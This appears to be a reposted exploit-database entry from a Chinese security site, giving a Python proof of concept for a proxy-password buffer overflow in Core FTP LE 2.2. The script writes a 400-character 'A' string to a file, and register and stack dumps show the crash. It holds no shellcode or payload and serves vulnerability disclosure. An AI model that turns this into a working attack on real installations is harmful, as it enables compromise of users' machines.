Core FTP Le 2.2 Buffer Overflow

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Core FTP Le 2.2 Buffer Overflow

来源：vfocus.net 作者：s0nk3y 发布时间：2016-07-12

#!/usr/bin/env python
'''
# Exploit Title: Core FTP Le v2.2 - Proxy Password Buffer Overflow
# Date: 2016-7-11
# Author: s0nk3y
# Software Link: ftp://ftp.coreftp.com/coreftplite.exe
# Version: 2.2
# Tested on: Windows XP
# CVE: N/A
# Type: Buffer Overflow

[+] Proof of concept
 Click options (Global Settings) -> Proxy -> enter the password and input "A"*400 -> Ok 

[+] Registers Detail:
EAX 0012CF54 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
ECX 41414145
EDX 0012CE64
EBX 41414145
ESP 0012CB1C
EBP 0012D0C4 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
ESI 41414141
EDI 0012CF54 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
EIP 004A1523 coreftp.004A1523
'''

buffer = "A" * 400
exploit = open("exploit.txt","w")
exploit.write(buffer)
exploit.close

'''
[+] Stack:
0012CCEC   00000003  ...
0012CCF0   00498BFE  þ‹I.  RETURN to coreftp.00498BFE from coreftp.004A1520
0012CCF4   0012D124  ___FCKpd___0Ntilde;.  ASCII "AAAAAAAAAAAAA...
0012CCF8   0012D034  4Ð.
0012CCFC   41414141  AAAA
0012CD00   00000000  ....
0012CD04   41414141  AAAA
0012CD08   41414141  AAAA
0012CD0C   41414141  AAAA
0012CD10   41414141  AAAA
0012CD14   41414141  AAAA
0012CD18   41414141  AAAA
0012CD1C   41414141  AAAA
....
'''

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告